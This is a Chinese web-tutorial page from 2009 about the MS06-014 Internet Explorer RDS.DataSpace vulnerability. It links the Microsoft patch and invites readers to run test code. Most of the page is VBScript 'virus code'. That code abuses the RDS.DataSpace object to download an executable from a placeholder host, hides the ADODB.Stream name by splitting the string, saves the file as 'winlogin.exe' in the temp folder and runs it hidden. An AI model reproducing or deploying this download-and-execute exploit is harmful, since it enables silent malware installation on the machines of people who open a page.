当前位置: 首页 > 图文教程 > 网络编程 > Javascript > 【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件

Javascript
Javascript入门学习第六篇 js DOM编程
Javascript入门学习第七篇 js dom实例操作
Javascript入门学习第八篇 js dom节点属性说明
Javascript入门学习第九篇 Javascript DOM 总结
Javascript入门学习资料收集整理篇
超级退弹代码
Firefox和IE浏览器兼容JS脚本写法小结
SWFObject Flash js调用类
javascript同步Import,同步调用外部js的方法
javascript jQuery $.post $.ajax用法
JS location几个方法小姐
关于树形菜单 Checkbox的全选
JS的数组的扩展实例代码
兼容ie ff div 层 打开+关闭+ 拖动+遮罩+移动+动画改变高宽
javascript 拽拉效果 供JS初学者学习参考
纯js实现的论坛常用的运行代码的效果
js显示当前星期的起止日期的脚本
神奇的代码 通杀各种网站-可随意修改复制页面内容
js番茄的表单验证类
番茄的表单验证类代码修改版

Javascript 中的 【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-12   浏览: 463 ::
收藏到网摘: n/a

请执行下面的代码测试您的机器是否存在漏洞:
点击运行可以看到效果:
[Ctrl+A 全选 提示:你可先修改部分代码,再按运行]

补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
复制代码 代码如下:

on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0